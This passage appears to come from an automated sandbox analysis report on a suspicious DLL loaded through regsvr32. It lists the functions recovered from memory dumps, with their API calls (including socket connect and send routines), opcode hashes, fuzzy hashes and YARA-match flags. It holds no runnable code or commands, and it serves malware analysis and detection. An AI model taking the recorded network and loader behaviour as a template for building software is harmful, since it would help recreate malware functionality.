                                                                  • Instruction Fuzzy Hash: C791C879E40304ABE721DF64DC44FAF7BBAEB89714F404559F949AB240D770AA40CF51
                                                                  Function 6C943EE0 Relevance: 34.8, APIs: 23, Instructions: 284COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0ee99675a16ffa57769413852fa67ec9606572c4be06faf0310e7e068666ce80
                                                                  • Instruction ID: 3ab898cbee97acc18aa721aac63296e350ddd1d0293179c885056ab1bf7dc7b4
                                                                  • Opcode Fuzzy Hash: 0ee99675a16ffa57769413852fa67ec9606572c4be06faf0310e7e068666ce80
                                                                  • Instruction Fuzzy Hash: 52B19C71A083468FE710CF28C48075ABBF1BF96308F08896DE9949BB42D375E944CF92
                                                                  Function 6C944200 Relevance: 31.7, APIs: 21, Instructions: 152COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D912
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D917
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D91C
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D921
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D926
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D92B
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D930
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D935
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93A
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93F
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D944
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D94C
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D951
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D956
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D95B
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D960
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D965
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96A
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96F
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D974
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D979
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: abort
                                                                  • String ID:
                                                                  • API String ID: 4206212132-0
                                                                  • Opcode ID: de6c290c473e007870593a1b3991c926761cdc51218c2bdd39329fdb6b0011f3
                                                                  • Instruction ID: 76627a21b604af1b5fb827e3ce67486cd5d840e2610777ece7a59a749fdfcbe8
                                                                  • Opcode Fuzzy Hash: de6c290c473e007870593a1b3991c926761cdc51218c2bdd39329fdb6b0011f3
                                                                  • Instruction Fuzzy Hash: B851ADB1A012458FCB00CFA8C4917A9BBF5BB49304F18856AED549F786E335D445CF20
                                                                  Function 6C945100 Relevance: 28.6, APIs: 19, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C944A90: strlen.MSVCRT ref: 6C944B0D
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D91C
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D921
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D926
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D92B
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D930
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D935
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93A
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93F
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D944
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D94C
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D951
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D956
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D95B
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D960
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D965
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96A
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96F
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D974
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D979
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: abort$strlen
                                                                  • String ID:
                                                                  • API String ID: 2656325428-0
                                                                  • Opcode ID: e44553d7272f7e7cd318aefb1d5762f86a82e1d8b47bfa40a29923cb615d5084
                                                                  • Instruction ID: e93705669adaad55d30cd5d55978fe21e0365816baaba93564f28fe5e5737938
                                                                  • Opcode Fuzzy Hash: e44553d7272f7e7cd318aefb1d5762f86a82e1d8b47bfa40a29923cb615d5084
                                                                  • Instruction Fuzzy Hash: B231EAB020D3C4CEEB12CF3AD4457567FE46796308F148559D7888B782DBBA8708C76A
                                                                  Function 02634520 Relevance: 27.2, APIs: 18, Instructions: 247threadnetworksleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000064), ref: 0263454A
                                                                  • timeGetTime.WINMM ref: 0263456B
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0263458B
                                                                  • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 026345AD
                                                                  • SwitchToThread.KERNEL32 ref: 026345C7
                                                                  • SetEvent.KERNEL32(?), ref: 02634610
                                                                  • CloseHandle.KERNEL32(?), ref: 02634634
                                                                  • send.WS2_32(?,02647440,00000010,00000000), ref: 02634658
                                                                  • SetEvent.KERNEL32(?), ref: 02634676
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02634681
                                                                  • WSACloseEvent.WS2_32(?), ref: 0263468F
                                                                  • shutdown.WS2_32(?,00000001), ref: 026346A3
                                                                  • closesocket.WS2_32(?), ref: 026346AD
                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 026346E6
                                                                  • SetLastError.KERNEL32(000005B4), ref: 026346FA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0263471B
                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02634733
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                  • String ID:
                                                                  • API String ID: 1692523546-0
                                                                  • Opcode ID: cc80681e8c67637e73b5b2567d1527e9167abf4bdca8c5b56d1f698513dc2524
                                                                  • Instruction ID: becd3d8f6f1baf22febe8908cda28a9951b93e7a51ec2ce5d74be1a26e381865
                                                                  • Opcode Fuzzy Hash: cc80681e8c67637e73b5b2567d1527e9167abf4bdca8c5b56d1f698513dc2524
                                                                  • Instruction Fuzzy Hash: 6391CD75A00612AFC726DF64D888BAAF7B5FF45714F108519E44A8B740CB31F8A1CBD0
                                                                  Function 6C945240 Relevance: 27.1, APIs: 18, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: strlen
                                                                  • String ID:
                                                                  • API String ID: 39653677-0
                                                                  • Opcode ID: 088acd37bd3a713edb7e45c284574c4c98f298a09f2d81b90e080a54e6eca424
                                                                  • Instruction ID: b4427c62e3d67c72a6382de97a69ec726517f71ead673faca7b53dd625f4829e
                                                                  • Opcode Fuzzy Hash: 088acd37bd3a713edb7e45c284574c4c98f298a09f2d81b90e080a54e6eca424
                                                                  • Instruction Fuzzy Hash: 4831807160934ACFE310CFA9D48076AB7E5BBC5308F54CA2EE59897B11E375E448CB92
                                                                  Function 6C945760 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 136COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: strlen
                                                                  • String ID: @
                                                                  • API String ID: 39653677-2766056989
                                                                  • Opcode ID: 4959abcb8968e174813994c793cfa9136a0369d768946d19e3e5bed084c7554a
                                                                  • Instruction ID: ac695a5529ccda6a88f4c8b4f668007f9a5d802f67b2d50a8f551263c1069a4e
                                                                  • Opcode Fuzzy Hash: 4959abcb8968e174813994c793cfa9136a0369d768946d19e3e5bed084c7554a
                                                                  • Instruction Fuzzy Hash: 1B511575A042099FCB10DFA5C880BDEB7B5AB99318F54C5A9D949A7700DB30EE88CF90
                                                                  Function 6C945390 Relevance: 25.6, APIs: 17, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: strlen
                                                                  • String ID:
                                                                  • API String ID: 39653677-0
                                                                  • Opcode ID: f053697617a4af61e89ce275da69e4e2f8eb43ba3e3e8cac62ed4faa79254380
                                                                  • Instruction ID: 5be1698b1de4dca7f35110074b801bca351bb078f12a8f26ed25fe3851916f97
                                                                  • Opcode Fuzzy Hash: f053697617a4af61e89ce275da69e4e2f8eb43ba3e3e8cac62ed4faa79254380
                                                                  • Instruction Fuzzy Hash: 424136B4A093018FD310CF69D48071ABBE5EB89708F10C92EE599CBB10D375D944CB92
                                                                  Function 02636390 Relevance: 19.6, APIs: 13, Instructions: 117libraryfileloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(026476BC), ref: 026363AC
                                                                  • GetProcAddress.KERNEL32(00000000,026476D4), ref: 026363BE
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 026363CF
                                                                  • _memset.LIBCMT ref: 026363FF
                                                                  • GetLocalTime.KERNEL32(?), ref: 0263640E
                                                                  • wsprintfW.USER32 ref: 02636455
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000), ref: 02636474
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 02636482
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0263649B
                                                                  • GetCurrentProcessId.KERNEL32(00000000,00000001,?,00000000,00000000), ref: 026364CB
                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00000000,00000000), ref: 026364D2
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 026364E0
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 026364E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Library$CurrentFree$Process$AddressCloseCreateFileHandleLoadLocalProcThreadTime_memsetwsprintf
                                                                  • String ID:
                                                                  • API String ID: 3529074497-0
                                                                  • Opcode ID: a24e9e8923ae01ec4966aa2bfede903709046789b4cc424bf6190427ca67d109
                                                                  • Instruction ID: d13d631100e879f2c9c689866e8d20d37f52999be9c3a4c882f971c140f79b68
                                                                  • Opcode Fuzzy Hash: a24e9e8923ae01ec4966aa2bfede903709046789b4cc424bf6190427ca67d109
                                                                  • Instruction Fuzzy Hash: DA412B79D80228BBD7209F64EC4CBBEB7B8EF58B10F500599F94A96180DB745990CBA4
                                                                  Function 6C9459B0 Relevance: 19.6, APIs: 13, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd34584560973e336ae1521f29c27fa0068d46a18c8e27656b340b26851b4eef
                                                                  • Instruction ID: ef9ddf2f0367814595ae9b1916dd10527bedb3502225c07fed6f9a4bd415fc4b
                                                                  • Opcode Fuzzy Hash: bd34584560973e336ae1521f29c27fa0068d46a18c8e27656b340b26851b4eef
                                                                  • Instruction Fuzzy Hash: E3214A75A002089FCB14DFA4D880ADEB7B5BF95304F10C569DC4967700EB30EE49CB91
                                                                  Function 6C8FAA00 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 294libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 6C8FAAAC
                                                                  • GetFullPathNameW.KERNEL32(?,00000000,00000002,00000000,00000000), ref: 6C8FAABB
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,?,00000000,00000002,00000000,00000000), ref: 6C8FAAC6
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,?,00000000,00000002,00000000,00000000), ref: 6C8FAADB
                                                                  • memcmp.MSVCRT(?,100FF214,E8558CFB,?,00000000,00000002,00000000,00000000), ref: 6C8FAB4C
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,?,00000000,00000002,00000000,00000000), ref: 6C8FAB7F
                                                                  • memcpy.MSVCRT(00000002,?,00000002,00000002,00000000,00000000), ref: 6C8FAC1F
                                                                  • GetModuleHandleA.KERNEL32(kernel32,?,?,?,00000000,?,?,?,00000002,00000000,00000000), ref: 6C8FAD58
                                                                  • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6C8FAD67
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AddressFreeFullHandleHeapModuleNamePathProcmemcmpmemcpy
                                                                  • String ID: SetThreadDescription$kernel32
                                                                  • API String ID: 356422747-1950310818
                                                                  • Opcode ID: 14ae7c20b3de3db6af48975db04750b7eaa42a35009c19ca83ea20782fd32c2a
                                                                  • Instruction ID: 46d909dda3264ef4269f521674fd7054f8b974b8240720b590e30c4a8a9408e6
                                                                  • Opcode Fuzzy Hash: 14ae7c20b3de3db6af48975db04750b7eaa42a35009c19ca83ea20782fd32c2a
                                                                  • Instruction Fuzzy Hash: ADA1F771E01205AFEB208F68DE85BEEB7F8AF14768F244824E814E7741E771DD158BA1
                                                                  Function 04F85BA5 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 263COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _memset
                                                                  • String ID: !jWW$.$_$e$i$l${vU_
                                                                  • API String ID: 2102423945-159827627
                                                                  • Opcode ID: a8fc06458b62c315747c6bbdeb4651bf35221ba8392fa4a222c40d994eed00a2
                                                                  • Instruction ID: 23a0b90ebf42cde74fd678a392edfc6d9c6a6780f20df2d870585fedd9e67053
                                                                  • Opcode Fuzzy Hash: a8fc06458b62c315747c6bbdeb4651bf35221ba8392fa4a222c40d994eed00a2
                                                                  • Instruction Fuzzy Hash: 0791A675A40304BBE720EF60DC44FEA7BB9EB85704F508159F9099F280D775AA41CFA5
                                                                  Function 6C8934D0 Relevance: 18.2, APIs: 1, Strings: 11, Instructions: 237COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: ($($($($($($($($($($(
                                                                  • API String ID: 2221118986-3337016023
                                                                  • Opcode ID: b40a8ae007ee8b51ade550ecaa414e76319589547d4e46e3f03c8fca436107c0
                                                                  • Instruction ID: 23424a356068af353f7dc6aa85b47f08cd0084a862dee7336d24bd8e08951271
                                                                  • Opcode Fuzzy Hash: b40a8ae007ee8b51ade550ecaa414e76319589547d4e46e3f03c8fca436107c0
                                                                  • Instruction Fuzzy Hash: 5AC1AD71C0A7988AEB21CF18C8457EDBBB0BF95308F14959CD9882B352DB715A89CF91
                                                                  Function 026336D0 Relevance: 18.1, APIs: 12, Instructions: 141networkstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 026336F0
                                                                  • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02633729
                                                                  • WSACreateEvent.WS2_32 ref: 0263375B
                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,0264DA88), ref: 0263376D
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,0264DA88), ref: 02633779
                                                                  • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,0264DA88), ref: 02633798
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0264DA88), ref: 026337A4
                                                                  • gethostbyname.WS2_32(00000000), ref: 026337B2
                                                                  • htons.WS2_32(?), ref: 026337D8
                                                                  • WSAEventSelect.WS2_32(?,?,00000030), ref: 026337F6
                                                                  • connect.WS2_32(?,?,00000010), ref: 0263380B
                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,0264DA88), ref: 0263381A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharEventMultiWidelstrlen$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                  • String ID:
                                                                  • API String ID: 1463362053-0
                                                                  • Opcode ID: c7e3700f0ef3b4c8b30f6d3f29a1ffa67155c80f1ff3ea40402055d4547b4231
                                                                  • Instruction ID: 3e9852b3317c3255c85a94fc32d58fd4be7f01d6a227c8227e2d73d297a5948e
